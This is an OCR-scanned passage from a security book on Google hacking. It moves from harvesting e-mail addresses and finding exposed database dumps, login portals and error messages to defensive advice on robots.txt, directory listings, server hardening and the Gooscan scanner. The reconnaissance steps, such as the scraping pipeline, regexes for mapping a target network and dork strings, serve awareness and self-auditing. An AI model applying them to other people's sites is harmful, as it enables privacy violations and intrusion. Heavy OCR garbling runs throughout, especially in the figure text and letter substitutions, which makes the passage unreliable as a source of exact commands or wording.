locate more e-mail addresses. Once the results are saved to the results.html file, we'U run our ssearch.pl script against the results.html file, searching for the e-mail expression we've placed in the wordfile.txt file. To help narrow our results, we'U pipe that output into "grep yahoo \ head —15 \ sort —u" to return at most 15 unique addresses that contain the word yahoo.The final (obfuscated) results are shown in Figure 10.13. Figure 10.13 ssearch.pl Hunting for E-Mail Addresses Tfy r\ r\ roor@localho5t jShnnyJ Lynx -duiiip "http://groups.googLe.com/groups?q=JS2)ii40y( 3hoo.comK22!ie0emai l&hUen&lr=&sa =NS results.html jBhnnyl ./ssearch.pl results, htm I wordfile.txt 1 grep yahoo head -15 1 sort -u ?IWS)iS;b3 Ik [Oyahoo .com 7KE6I60FDayahoo.com *ife^;j**6i3yahoo . com >n. I*!j*«-r ior2003i3yahoo.ccm j?««s««jticproayahoo .com -!**J*ift^ji lders_int liSyahoc .com "^«!i?<$Si3yahoo . com nsfNai^-ingbyemai ISyahoo.ccm > ) "^ss-.l ver_ i nc@yahoo . com ■T**>*l30e34iayahoo .com jsDHS^vfispec ial_00iSyahoo.com >*!^J'iS300i3yahoo .com jShnnyl | W WWW. syngress.com Document Grinding and Database Digging • Chapter 10 315 As you can see, this combination of commands works fairly well at unearthing e-mail addresses. If you're familiar with UNIX commands, you might have already noticed that there is little need for two separate commands. This entire process could have been easily combined into one command by modifying the Perl script to read standard input and piping the output from the Lynx com- mand directly into the ssearch.pl script, effectively bypassing the results. htinl file. Presenting the commands this way, however, opens the door for irresponsible automation techniques, which isn't overtly encouraged. Other regular expressions can come in handy as well. This expression, also by Don Ranta, locates URLs: [a-zA-Z] {3, 4} [sS] ?:/ / ( ( ( [\w\d\-]+\ . ) + [ a-zA-Z] { 2 , 4 } ) | ( ( 2 5 [ 0 -5 ] | 2 [ 0- 4]\d|l\d\d| [1-9] \d| [1-9] ) \ . (25 [0-5] | 2 [ 0-4 ] \d | l\d\d | [ 1-9 ] \d | [ 1-9 ] ) \ . ( 25 [ 0- 5] |2[0-4]\d|l\d\d| [1-9] \d| [1-9] ) \ . (25 [0-5] | 2 [ 0-4 ] \d | l\d\d | [1-9] \d| [1- 9] ) ) ) ( (\? I / ) [\w/=+#_~&: ;%\-\?\ . ] *) This expression, which wiU locate URLs and parameters, including addresses that consist of either IP addresses or domain names, is great at processing a Google results page, returning all the links on the page. This doesn't work as well as the API-based methods we'U explore in the next chapter, but it is simpler to use than the API method. This expression locates IP addresses: (25 [0-5] |2[0-4]\d|l\d\d| [ 1-9 ] \d | [ 1-9 ] ) \ . (25 [ 0-5 ] | 2 [ 0-4 ] \d | l\d\d | [l-9]\d| [l- 9 ] ) \ . (25 [ 0-5 ] |2 [0-4] \d| l\d\d| [1-9] \d I [1-9] ) \. (25 [0-5] | 2 [ 0-4 ] \d | l\d\d | [1- 9] \d| [1-9] ) We can use an expression like this to help map a target network. These tech- niques could be used to parse not only HTML pages but also practically any type of document. However, keep in mind that many files are binary, meaning that they should be converted into text before they're searched. The UNIX strings command (usually implemented with strings —8 for this purpose) works very well for this task, but don't forget that Google has the built-in capability to translate many different types of documents for you. If you're searching for visible text, you should opt to use Google's translation, but if you're searching for nonprinted text such as metadata, you'll need to first download the original file and search it offline. Regardless of how you implement these techniques, it should be clear to you by now that Google can be used as an extremely powerful information- gathering tool when it's combined with even a little automation. www. syngress.com 316 Chapter 10 • Document Grinding and Database Digging Google Desktop Search The Google Desktop, available irom http://desktop.google.com, is an application that allows you to search files on your local machine. Currently available for Windows 2000 and Windows XP, Google Desktop Search allows you to search many types of files, as shown in Table 10.10. Table 10.10 Google Desktop Search File Types File Type Version Outlook 2000+ e-mail Outlook 2000 and newer Outlook Express 5+ e-mail Outlook Express 5 and newer Text documents N/A HTML documents N/A Word documents Office 2000 and newer Excel spreadsheets Office 2000 and newer PowerPoint presentations Office 2000 and newer AOL Chat conversations AOL 7 and newer AOL Instant Messenger Chat AIM 5 and newer conversations Viewed Web pages Internet Explorer 5 and newer The Google Desktop search offers many features, but since it's a beta product, you should check the desktop Web page for a current list of features. For a document-grinding tool, you can simply download content from the target server and use Desktop Search to search through those files. This offers a distinct advantage over searching the content online through Google; you can't OR the Jiletype operator in an online search. With Google Desktop Search, you can search many different file types with only one query. In addition, the Desktop Search tool captures Web pages that are viewed in Internet Explorer 5 and newer. This means you can always view an older version of a page you've visited online, even when the original page has changed. In addition, once Desktop Search is installed, any online Google Search you perform in Internet Explorer will also return results found on your local machine. www. syngress.com Document Grinding and Database Digging • Chapter 10 Summary The subject of document grinding is topic worthy of an entire book. In a single chapter, we can only hope to skim the surface of this topic. An attacker (black or white hat) who is skilled in the art of document grinding can glean loads of information about a target. In this chapter we've discussed the value of configu- ration files, log files, and office documents, but obviously there are many other types of documents we could focus on as well. The key to document grinding is first discovering the types of documents that exist on a target and then, depending on the number of results, narrowing the documents to the ones that might be the most interesting. Depending on the target, the Hne of business they're in, the document type, and many other factors, various keywords can be mixed with fiktype searches to locate key documents. Database hacking is also a topic for an entire book. However, there is obvious benefit to the information Google can provide prior to a full-blown database audit. Login portals, support files, and database dumps can provide various information that can be recycled into an audit. Of all the information that can be found from these sources, perhaps the most telling (and devastating) is source code. Lines of source code provide insight into the way a database is structured and can reveal flaws that might otherwise go unnoticed from an external assessment. In most cases, though, a thorough code review is required to determine appHcation flaws. Error messages can also reveal a great deal of information to an attacker. Automated grinding allows you to search many documents programmatic ally for bits of important information. When it's combined with Google's excellent document location features, you've got a very powerfiil information-gathering weapon at your disposal. Solutions Fast Track Configuration Files 0 Configuration files can reveal sensitive information to an attacker. 0 Although the naming varies, configuration files can often be found with file extensions Hke INI, CONF, CONFIG, or CFG. Chapter 10 • Document Grinding and Database Digging Log Files 0 Log files can also reveal sensitive information that is often more current than the information found in configuration files. 0 Naming convention varies, but log fdes can often be found with fde extensions Hke LOG. Office Documents 0 In many cases, office documents are intended for public release. Documents that are inadvertently posted to public areas can contain sensitive information. 0 Common office file extensions include PDF, DOC, TXT, or XLS. 0 Document content varies, but strings Hke private, password, backup, or admin can indicate a sensitive document. Database Digging 0 Login portals, especially default portals supplied by the software vendor, are easily searched for and act as magnets for attackers seeking specific versions or types of software. The words login, welcome, and copyright statements are excellent ways of locating login portals. 0 Support files exist for both server and cHent software. These files can reveal information about the configuration or usage of an appHcation. 0 Error messages have varied content that can be used to profile a target. 0 Database dumps are arguably the most revealing of all database finds because they include full or partial contents of a database. These dumps can be located by searching for strings in the headers, Uke "# Dumping data for table". Links to Sites 0 www.filext.com A great resource for getting information about file extensions. 0 http://desktop.google.com The Google Desktop Search appHcation. Document Grinding and Database Digging • Chapter 10 0 http://johnny.ihackstuflr.com The home of the Google Hacking Database, where you can find more searches like those listed in this chapter. Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Ql what can I do to help prevent this form of information leakage? Al To fix this problem on a site you are responsible for, first review all docu- ments available from a Google search. Ensure that the returned documents are, in fact, supposed to be in the pubHc view. Although you might opt to scan your site for database information leaks with an automated tool (see the Protection chapter), the best way to prevent this is at the source. Your database remote administration tools should be locked down from outside users, default login pmtaK^ould be reviewed for safety and checked to ensure that software ftrsiomng information has been removed, and support files should be remoMikifaAi your pubHc servers. Error messages should be tailored to ensure that excessive information is not revealed, and a full appli- cation review should be performed on all applications in use. In addition, it doesn't hurt to configure youj Web server to only allow certain file types to be downloaded. It's much e^er to l^Lthe we types ^mi will allow than to Hst the file types you don't allow. Se^ne Awendix foBnore information about Web appHcation security testing. M Ql I'm concerned about excessive metadata in office dq^ments. Can I do any- thing to clean up my documents? A: Microsoft provides a Web page dedicated to the topic: http://support. microsoft.com/ default. aspx?scid=kb;EN-US;Q223396. In addition, several utilities are available to automate the cleaning process. One such product, ezClean, is available firom www.kklsoftware.com. www. syngress.com 320 Chapter 10 • Document Grinding and Database Digging Many types of software rely on include files to pull in external content. As I understand it, include files, like the INC files discussed in this chapter, are a problem because they often reveal sensitive information meant for programs, not Web visitors. Is there any way to resolve the dangers of include files? Include files are in fact a problem because of their file extensions. If an extension such as .INC is used, most Web servers will display them as text, revealing sensitive data. Consider blocking .INC files (or whatever extension you use for includes) from being downloaded. This server modification will keep the file from presenting in a browser but wiU still allow back-end pro- cesses to access the data within the file. Our software uses .INC files to store database connection settings. Is there another way? Rename the extension to .PHP so that the contents are not displayed. How can I avoid our X appUcation database from being downloaded by a Google hacker? Read the documentation. Some badly written software has hardcoded paths but most allow you to place the file outside the Web server's doaoot. www.syngress.com Chapter Protecting Yourself from Google Hackers III i Solutions in this Chapter: ■ A Good, Solid Security Policy Webi^rver Safeguards ■ Hacking Your Owi Getting Help from Google ks to Sites "^0 Summary 0 Solutions Fast^rack 0 Frequently Asked Questions 321 -1 Chapter 11 • Protecting Yourself from Google Hackers Introduction The purpose of this book is to help you understand the tactics a Google hacker might employ so that you can properly protect yourself and your customers from this seemingly innocuous threat. The best way to do this, in our opinion, is to show you exactly what an attacker armed with a search engine like Google is capable of. There is a point at which we must discuss in no uncertain terms exactly how to prevent this type of information exposure or how to remedy an existing exposure. This chapter is all about protecting your site (or your cus- tomer's site) from this type of attack. We'll look at this topic from several perspectives. First, it's important that you understand the value of strong poUcy with regard to posting data on the Internet. This is not a technical topic and could very easily put the techie in you fast asleep, but a sound security policy is absolutely necessary when it comes to properly securing any site. Second, we'll look at slightly more technical topics that describe how to secure your Web site from Google's (and other search engine's) crawlers. We'll then look at some tools that can be used to help check a Web site's Google exposure, and we'll spend some time talking about ways Google can help you shore up your defenses. Underground Googling Where Are the Details? There are too many types of servers and configurations to show how to locl< them all down. A discussion on Web server security could easily span an entire book series. We'll look at server security at a high level here, focusing on strategies you can employ to specifically protect you from the Google hacker threat. For more details, please check the references in the "Links to Sites" section. A Good, Solid Security Policy The best hardware and software configuration money can buy can't protect your resources if you don't have an effective security policy. Before implementing any Protecting Yourself from Google Hackers • Chapter 11 323 software assurances, take the time to review your customer's (or your own) secu- rity policy. A good security policy, properly enforced, outlines the assets you're trying to protect, how the protection mechanisms are installed, the acceptable level of operational risk, and what to do in the event of a compromise or disaster. Without a solid, enforced security policy, you're fighting a losing battle. Web Server Safeguards There are several ways to keep the prying eyes of a Web crawler from digging too deeply into your site. However, bear in mind that a Web server is best suited for storing data that is meant for public consumption. Despite aU the best protec- tions, information leaks happen. If you're reaUy concerned about keeping your sensitive information private, keep it away from your public Web server. Move that data to an intranet or onto a specialized server that is dedicated to serving that information in a safe, responsible, policy-enforced manner. Don't get in the habit of splitting a public Web server into distinct roles based on access levels. It's too easy for a user to copy data from one file to another, which could render some directory-based protection mechanisms use- less. Likewise, consider the implications of a public Web server system compro- mise. In a weU thought out, properly constructed environment, the compromise of a public Web server only results in the compromise of public information. Proper access restrictions would prevent the attacker from bouncing from the Web server to any other machine, making further infiltration of more sensitive information aU the more difficult for the attacker. If sensitive information were stored alongside public information on a public Web server, the compromise of that server could potentially compromise the more sensitive information as well. We'U begin by taking a look at some fairly simple measures that can be taken to lock down a Web server from within. These are general principles; they're not meant to provide a complete solution but rather to highlight some of the common key areas of defense. We wiU not focus on any specific type of server but wiU look at suggestions that should be universal to any Web server. We wiU not delve into the specifics of protecting a Web application, but rather we'U explore more common methods that have proven especially and specifically effective against Web crawlers. www. syngress.com 324 Chapter 11 • Protecting Yourself from Google Hackers Directory Listings and Missing Index Files We've already seen the risks associated with directory listings. Although minor information leaks, directory listings allow the Web user to see most (if not all) of the files in a directory, as well as any lower-level subdirectories. As opposed to the "guided" experience of surfing through a series of prepared pages, directory listings provide much more unfettered access. Depending on many factors, such as the permissions of the files and directories as well as the server's settings for allowed files, a casual Web browser could get access to files that should not be public. Figure 11.1 demonstrates an example of a directory listing that reveals the location of an htaccess file. Normally, this file (which should be called .htaccess, not htaccess) serves to protect the directory contents from unauthorized viewing. However, a server misconfiguration allows this file to be seen in a directory listing and even read. Figure 11.1 Directory Listings Provide Road Maps to Nonpublic Files S e"ee ^ [ ^ >■ I I e I 01 " Q- intitleiindex. of ".htaccess" Index of /^ivann/pub/xxx Name Last modified Size Description 43k 311k 1 .6H 1.5H Ik 30k Apache/ 1 J 27 Server ' Display a menu j Directory listings should be disabled unless you intend to allow visitors to peruse files in an FTP-style fashion. On some servers, a directory listing will appear if an index file (as defined by your server configuration) is missing. These files, such as index.html, index.htm, or default.asp, should appear in each and every directory that should present a page to the user. On an Apache Web server, you can disable directory listings by placing a dash or minus sign before the word Parent Directory 1^ Deer ■ ip 12 MTET . IB MTET. X dancinqd. mpeq IE hia m ■ EXE taccess gabbit-j-ohioken ■ icq 15-Jul-2004 20;08 11- Feb-2000 19;(I3 04-Of!t-1999 26:14 04-Oct-1999 20:24 12- gep-1999 16:35 20-Hay-2O0O 00!42 ll-Feb-2000 19:03 WWW. syngress.com Protecting Yourself from Google Hackers • Chapter 11 325 Indexes in the httpd.conf file. The line might look something Uke this if directory Ustings (or "indexes," as Apache calls them) are disabled: Options -Indexes FollowSymLinks MultiViews Blocking Crawlers with Robots.txt The robots.txt file provides a list of instructions for automated Web crawlers, also called robots or bots. Standardized at www.robotstxt.org/wc/norobots.html, this file allows you to define, with a great deal of precision, which files and directo- ries are off-limits to Web robots. The robots.txt file must be placed in the root of the Web server with permissions that allow the Web server to read the file. Lines in the file beginning with a # sign are considered comments and are ignored. Each line not beginning with a # should begin with either a User-agent or a dis- allow statement, followed by a colon and an optional space. These lines are written to disallow certain crawlers from accessing certain directories or files. Each Web crawler should send a iiser-agent field, which lists the name or type of the crawler. The value of Google's user-agent field is Googlebot. To address a disallow to Google, the user-agent line should read: User-agent: Googlebot According to the original specification, the wildcard character * can be used in the user-agent field to indicate all crawlers. The disallow Une describes what, exactly, the crawler should not look at. The original specifications for this file were fairly inflexible, stating that a disallow line could only address a full or par- tial URL. According to that original specification, the crawler would ignore any URL starting with the specified string. For example, a line like Disallow: /foo would instruct the crawler to ignore not only /foo but /foo /index. html, whereas a line like Disallow: /foo/ would instruct the crawler to ignore /foo /index. html but not /foo, since the slash trailing^oo must exist. For example, a valid robots.txt file is shown here: #abandon hope all ye who enter User-Agent: * Disallow: / This file indicates that no crawler is allowed on any part of the site — the ulti- mate exclude for Web crawlers. The robots.txt file is read from top to bottom as ordered rules. There is no allow line in a robots.txt file. To include a particular www. syngress.com Chapter 11* Protecting YOurself from Google Hackers crawler, disallow it access to nothing. This might seem like backward logic, but the following robots.txt file indicates that all crawlers are to be sent away except for the crawler named Palookaville: #Bring on Palookaville User-Agent: * Disallow: / User-Agent: Palookaville Disallow: Notice that there is no slash after Palookaville s disallow. (Norman Cook fans will be delighted to notice the absence of both slashes and dots from anywhere near Palookaville.) Saying that there's no disallow is like saying that user agent is allowed — sloppy and confusing, but that's the way it is. Google allows for extensions to the robots.txt standard. A disallow pattern may include * to match any number of characters. In addition, a $ indicates the end of a name. For example, to prevent the Googlebot from crawling all your PDF documents, you can use the following robots.txt file: ttAway from my PDF files, Google! User-Agent: Googlebot Disallow: /*.PDF$ Once you've gotten a robots.txt file in place, you can check its validity by visiting the Robots.txt Validator at www.searchengineworld.com/cgi-bin/ robotcheck.cgi. Underground Googling Web Crawlers and Robots.txt Hackers don't have to obey your robots.txt file. In fact, Web crawlers really don't have to, either, although most of the big-name Web crawlers will, if only for the "CYA" factor. One fairly common hacker trick is to view a site's robots.txt file first to get an idea of how files and directories are mapped on the server. In fact, as shown in Figure 11.2, a quick Google query can reveal lots of sites that have had their robots.txt files crawled. This, of course, is a misconfiguration, because the robots.txt file is meant to stay behind the scenes. Protecting Yourself from Google Hackers • Chapter 11 327 Figure 11.2 Robots.txt Should Not Be Crawled o o o Google Search: inurhrabat^.txt firetype:txt ~< >~\ I C I |C|hitp://www.goo9le.com/searcli?q = lri ~ Q- inurhrobots.cxt filecypeicxt Google Web Images Groups News Fropql I: robots.txt filetYpe:txt ■nore » ' Search ^ praf^mn-^ Web Results 1 - 10 Qf about 7,efi0 for inurl:rDbDt5.txt filetvpe:txt. (0.£0 seconds) # robots.txt for http:/Avww,whilehause, go*// User-agent: * Disallow ... Sponsored Links Free Robots.tKt Generator # r&bots.t)ct for httpi//ww.whitehouse.90v/ User-agent: ' DisallGw: /cgi- Search engine optimization tools L bin Disallow: /search Disallow: /query. html Disallow: /help Disallow: /MOplGs/lraq ... www.whitehouse.'gov/robots.b(t - 74k - Cached - Similar pages in a web based environment wrtw.sitesubmlt.ca See your message here... User-agent: ' Disallow: /search Disallow: /groups Disallow ... User-agent: " Disallow: /search Disallow: /groups Disallow: /Images Disallow: /catalogs Disallow: /catalog_llst Disallow: /news Disallow: /pagead/ Disailorw ... news.900gle.com/robots.txt - Ik - Cached - Similar pages # robots, scram User-agent: * Disallow: /cgi-bin Disallow ... # robotSi scram User-agent: * Disallow: /cgl-bin Disallow: /TRANSCRIPTS Disallow: /deveiopnent Disallow: /third Disallow: /beta Disallow; /Java Disallow ... www.cnn.com/robots.txt - 4k - Cached - Similar pages Sid: robots.txtv 1 .18 2QQ3/08/2Q 15:42:41 krusch Exp S ##Thi5 ... #$ldL robots.txt,v 1.18 3003/OB.'20 15:42:41 krusch Exp $^#Thls is a file retrieved by webwaikers aka spiders that # confonn to a defacto standard. ... www.lbm.com/robots.txt - 3k - Cached - Similar pag^es NOARCHIVE: The Cache "Killer" The robots.txt file keeps Google away from certain areas of your site. However, there could be cases where you want Google to crawl a page, but you don't want Google to cache a copy of the page or present a "cached" link in its search results. This is accomplished with a META tag. To prevent aU (cooperating) crawlers fi^om archiving or caching a document, place the following META tag in the HEAD section of the document: If you prefer to keep only Google from caching the document, use this META tag in the HEAD section of the document: " Any cooperating crawler can be addressed in this way by inserting its name as the META NAME. Understand that this rule only addresses crawlers. Web visi- tors (and hackers) can stiU access these pages. NOSNIPPET: Getting Rid of Snippets A snippet is the text listed below the title of a document on the Google results page. Providing insight into the returned document, snippets are convenient when you're blowing through piles of results. However, in some cases, snippets www.syngress.com 328 Chapter 11 • Protecting Yourself from Google Hackers should be removed. Consider the case of a subscription-based news service. Although this type of site would like to have the kind of exposure that Google can offer, it needs to protect its content (including snippets of content) from nonpaying subscribers. Such a site can accomplish this goal by combining the NOSNIPPET META tag with IP-based filters that allow Google's crawlers to browse content unmolested. To keep Google from displaying snippets, insert this code into the document: An interesting side effect of the NOSNIPPET tag is that Google will not cache the document. NOSNIPPET removes both the snippet and the cached page. Password-Protection Mechanisms Google does not fiU in user authentication forms. When presented with a typical password form, Google seems to simply back away from that page, keeping nothing but the page's URL in its database. Although it was once rumored that Google bypasses or somehow magically bypasses security checks, those rumors have never been substantiated. These incidents are more likely an issue of timing. If Google crawls a password-protected page either before the page is pro- tected or while the password protection is down, Google will cache an image of the protected page. Clicking the original page will show the password dialog, but the cached page does not — providing the illusion that Google has bypassed that page's security. In other cases, a Google news search will provide a snippet of a news story from a subscription site (shown in Figure 11.3), but clicking the link to the story presents a registration screen, as shown in Figure 11.4. This also cre- ates the illusion that Google can magically bypass pesky password dialogs and registration screens. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 Figure 11.3 Google Reveals a Page Snippet o o o Google Search: team: CSC 50urce:chicago_tribune subscription.. 1 ^ - 1 1 C 1 |G]http://new5. google. com/new5?hl=en&lr= " Qr team CSC C j—y^ f Web Imaoes Groups News Frooole more » t J [ team CSC source:chicago_tribune_subs£| f Search Newrs ^ f Search tJie Web • prBfBrs'n'^Bs r 1 NgWS Results 1 - 1 of about 1 from news source Chicago Tribune (subscription) for team CSC. (D.D5 seconds} Top Stories Sorted bv relevance Sort bv date World Search news oaoes that contain the term team CSC ehicaao ^tribune. U.S. Business Basso Wins Tuneup for Road Cyclinq Worids Sci/Tech Chicago Tribune (subscription). IL - Sep 25, 2004 Sports ... "Thus, I'm overjoyed with this victory.". Basso, of the CSC team, completed the 121.8 miles In 4 hours, 5B miriutes, 45 seconds. Casagraride ... Entertainment Health In order to show you the most relevant results, we have omitted some E News Alerts entries very similar to the 1 already displayed. If you liife. you can repeat the search with the omitted results included. >^ T — ^1 Figure 11.4 ...Although the Site Requires Registration M COVERAGE ChicaQoSports.com ] [ C ] £Shttp://chicago-sporcs,chica90tribijne,com, " Or team C5C Please register or log in The story you requested ts available only to registered members. Registration is FREE and offers great benefits . Register now AEreacFy regtetered? Log In: Registered wrth cWcagotrtbyne.com? Member Sim ply log In, yo u a re a I ready reg Iste red name: with chicagosports.com. Forget your member name and/or password? click here . IMPORTANT: Your browser MUST accept cookies \n order to successfully login. ■MtocantaT ■ Aii^rtfatinq youraiaxiunt Bears Today help: * Agrtwate subscription * FAQs If you're really serious about keeping the general public (and crawlers like Google) away from your data, consider a password authentication mechanism. A basic password authentication mechanism, htaccess, exists for Apache. An htaccess fde, combined with an htpasswd file, allows you to define a list of username/ password combinations that can access specific directories. You'U find an Apache 330 Chapter 11 • Protecting Yourself from Google Hackers htaccess tutorial at http://httpd.apache.org/docs/howto/htaccess.html, or try a Google search for htaccess howto. Software Default Settings and Programs As we've seen throughout this book, even the most basic Google hacker can home in on default pages, phrases, page titles, programs, and documentation with very little effort. Keep this in mind and remove these items from any Web soft- ware you install. It's also good security practice to ensure that default accounts and passwords are removed as well as any installation scripts or programs that were supplied with the software. Since the topic of Web server security is so vast, we'U take a look at some of the highlights you should consider for a few common servers. The Microsoft IIS 5.0 Security Checklist (see the "Links to Sites" section at the end of this chapter) lists quite a few tasks that can help lock down an IIS 5.0 server in this manner: ■ Remove the MISSamples directory (usually from c:\inetpub\iissamples). ■ Remove the MISHelp directory (usually from c:\winnt\help\iishelp). ■ Remove the \MSADC directory (usually from c:\program filesXcommon files\system\msadc) . ■ Remove the IISADMPWD virtual directory (found in c:\winnt\system32\inetsrv\iisadmpwd directory and the ISM.dU file). ■ Remove unused script extensions: ■ Web-based password change: .htr ■ Internet database connector: .idc ■ Server-side includes: .stm, .shtm and .shtml ■ Internet printing: .printer ■ Index server: .htw, .ida and .idq The Apache 1.3 series comes with fewer default pages and directories, but keep an eye out for the following: ■ The / manual directory from the Web root contains the default docu- mentation. ■ Several language files in the Web root beginning with index. htinl. These default language files can be removed if unused. www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 331 Underground Googling Patch That System it certainly sounds like a cliche in today's security circles, but it can't be stressed enough: If you choose to do only one thing to secure any of your systems, it should be to keep up with and install all the latest software security patches. Misconfigurations make for a close second, but without a firm foundation, your server doesn't stand a chance. Hacking Your Own Site Hacking into your own site is a great way to get an idea of its potential security risks. Obviously, no single person can know everything there is to know about hacking, meaning that hacking your own site is no replacement for having a real penetration test performed by a professional. Even if you are a pen tester by trade, it never hurts to have another perspective on your security posture. In the realm of Google hacking, there are several automated tools and techniques you can use to give yourself another perspective on how Google sees your site. We'll start by looking at some manual methods, and we'U finish by discussing some automated alternatives. Wa rning I As we'll see in this chapter, there are several ways a Google search can I be automated. Google frowns on any method that does not use its sup- g plied Application Programming Interface (API) along with a Google " license key. Assume that any program that does not ask you for your license key is running in violation of Google's terms of service and could result in banishment from Google. Check these important links, www.google.com/terms_of_service.html and www.bmedia.org/ archives/000001 09. php, for more information. Be nice to Google and Google will be nice to you! www. syngress.com 332 Chapter 11 • Protecting Yourself from Google Hackers Site Yourself We've talked about the site operator throughout the book, but remember that site allows you to narrow a search to a particular domain or server. If you're suUo, the author of the (most impressive) NIKTO tool and administrator of cirt.net, a query like site xirt. net will list all Google's cached pages irom the cirt.net server, as shown in Figure 11.5. Figure 1 1 .5 A Site Searcli is One Way to Test Your Google Exposure CooqIg Search) siteicirt^net \ < ' 1 C 1 [G]lmtp://www.google,coiTi/sear<:li7q=sice:cirt.ne " site:circ.nei Web Imaoes GrouDS News Frocwle more » GO< jQle If^^FsS^ir^ 1 t Web ResulLs 1 - 10 of about 3d4 from cirt.net for . (O.U seconds) Default Passwords Suspicion Breeds Confidence. Data, Default Passwords Default Wireless SSIDs Default Port List. Code, Nikto Web Scanner Moving Target Forms Nessus Plugins More www.cirt.nefcoi-bin/Da£swd. Dl?method=showven&ven=RamD%20Networl<£ - l&k - Cached - Similar Dao^ vvww.cirt.nel/nikto/UPDATES/1.32/nikto user enum apache.pluqin File Format: Unrecoonized - View as HTML Similar oaoes Default Passwords Suspicion Breeds Confidence. ... www.cirt.nefcoi-binyDasswd. Dl?metlnod=showven&ven=Dell - t9k - Cached - Similar cages #VERSI0N.1 .089 #LASTMOD.1 0.23.2003 # http://www,cirt.net/ "Abyss ... ^fyERSlON,1.089 #LASTM0D,1 0.23.2003 # hLtpiyywmv.cirt.net;' "Abyss\/1\.0\.3","May be vulnerable to directory traversal by using '%5c%2e%2e%5c' type paths ... \iWrtv.cirt.nefnikto/UPDATES/1.31/server msos.db - 24k - Cached - Similar oaoes Display a niETiu You could certainly click each and every one of these links or simply browse through the list of results to determine if those pages are indeed supposed to be public, but this exercise could be very time consuming, especially if the number of results is more than a few hundred. Obviously, you need to automate this pro- cess. Let's take a look at some automation tools. Gooscan Gooscan, written by Johnny Long, is a Linux-based tool that enables bulk Google searches. The tool was not written with the Google API and therefore violates Google's Terms of Service (TOS). It's a judgment call as to whether or not you want to knowingly violate Google's TOS to scan Google for informa- tion leaks originating from your site. If you decide to use a non- API-based tool, remember that Google can (though very rarely does) block certain IP ranges www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 333 from using its search engine. Also keep in mind that this tool was designed for securing your site, not breaking into other people's sites. Play nice with the other children, and unless you're accustomed to living on the legal edge, use the Gooscan code as a learning tool and don't actually run it! Gooscan is available from http://johnny.ihackstuff.com. Don't expect much in the way of a fancy interface or point-and-click functionality. This UNIX- based tool is command-Une only and requires a smidge of technical knowledge to install and run. The benefit is that Gooscan is lean and mean and the best cur- rent alternative to the Windows-only tools. Installing Gooscan To install Gooscan, first download the tar file, decompressing it with the tar com- mand. Gooscan comes with one C program, a README file, and a directory filled with data fdes, as shown in Figure 11.6. Figure 11.6 Gooscan Extraction and Installation root@localho5t:~/file/final — bash — 3e2 ~/DesktQp$ tar -xvf gooscan-vQ.^.tar gooscan-v0.9/ gooscan-v0 .9/gooscan .c gooscan-v0 .9/clata_f 1 Les/ gooscan-v0.9/data_f 1 Les/f i letype.gs goQScan-v0 .9/clata_f 1 Les/gdork .gs gooscan-v0 .9/data_f i Les/indexof .gs gooscan-v0 .9/data_f i Les/inur I .gs gooscan-v0 .9/README ~/Desktop$ cd gooscan-v0.9 ~/DesktQp/gQOscan-v0.9t Is README data.files goosi ~/Desktop/gooscan-v0.9t gcc -o goosci es gooscan. c gcc -0 gooscan gooscan. c| Once the files have been extracted from the tar file, you must compile Gooscan with a compiler such as GCC. Mac users should first install the XCode package from the Apple Developers Connection Web site, http://connect.apple.eom/.Windows users should consider a more "graphical" alternative such as Athena or SiteDigger, because Gooscan does not currently compile under environments like CYGWIN. www. syngress.com 334 Chapter 11 • Protecting Yourself from Google Hackers Gooscan's Options Gooscan's usage can be listed by running the tool with no options (or a combi- nation of bad options), as shown in Figure 11.7. Figure 11.7 Gooscan's Usage rervo rootig)localho5T:-/file/final — bash ■ ~/Desktop/gooscan-v0 .9$ ./gooscan gooscan <-q query I -1 query_fiLe> <-t target> [-0 output _f lie] [-P proxy :port] [-v] [-d] [-S site] [-X xtra_appllance_f ieLds] (query) is a standard google query (EX: "lntitle:lndex.of ") (query_file) is a list of google queries (see README) (target) is the Google appliance/server (output_f 1 le) is where the HTML-formatted list of results goes (proxy:port) address:port of a valid HTTP proxy for bouncing (site) restricts seorch to one domain, like microsoft. com (xtra_appliance_f ields) are required for appliance scans -V turns on verbose mode -d hex-encodes all non-alpha characters Friendly example: gooscan -t google.fda.gov -q food -X "£cl ient=FDA£site=FDA££iutput=xm l_no_dtd£oe=£:lr=£proxysty lesheet=FDA" Google terms-of -service violations: gooscan -t www. google. com -q "llnux" gooscan -t www.google.com -q "linux" -s microsoft.com gooscan -t www.google.com -f gdork.gs Gooscan google scanner by jBhnny http://johnny.ihackstuff.com VDesktop/gooscan-v0.9| I Gooscan's most commonly used options are outlined in the included README file. Let's take a look at how the various options work: ■ <-t target> (required argument) This is the Google appliance or server to scan. An IP address or host name can be used here. Caution: Entering www.google.com here violates Google's terms of service and is neither recommended nor condoned by the author. ■ <-q query \ -i query^le> (required argument) The query or query file to send. Gooscan can be used to send an individual query or a series of queries read irom a fde. The -q option takes one argument, which can be any valid Google query. For example, these are valid options: -q googledorks -q "microsoft sucks" -q " intitle : index . of secret" ■ [ -i input^le] (optional argument) The -/ option takes one argu- ment — the name of a Gooscan data fde. Using a data file allows you to www. syngress.com Protecting Yourself from Google Hackers • Chapter 11 335 perform multiple queries with Gooscan. See the following list for infor- mation about the included Gooscan data files. ■ [-0 output^le] (optional argument) Gooscan can create a nice HTML output file. This file includes links to the actual Google search results pages for each query. ■ [-p proxy:port] (optional argument) This is the address and port of an HTML proxy server. Queries will be sent here and bounced off to the appUance indicated with the -t argument. The format can be similar to 10.1.1.150:80 ox proxy.validcompany.com: 8080. ■ [-v] (optional argument) Verbose mode. Every program needs a ver- bose mode, especially when the author sucks with a command-line debugger. ■ [s site] (optional argument) This filters only results fr-om a certain site, adding the site operator to each query Gooscan submits. This argu- ment has absolutely no meaning when used against Google appliances, since Google appliances are already site filtered. For example, consider the following Google queries: site :microsoft . com linux site : apple . com microsoft site : linux . org microsoft With advanced express permission from Google, you could run the following with Gooscan to achieve the same results: $ ./gooscan -t www.google.com -s microsoft.com linux $ ./gooscan -t www.google.com -s apple.com microsoft $ ./gooscan -t www.google.com -s linux.org microsoft ■ The [-x] and [-d] options are used with the Google appliance. We don't talk too much about the Google appliance in this book. Suffice it to say that the vast majority of the techniques that work against Google.com will work against a Google appliance as well. 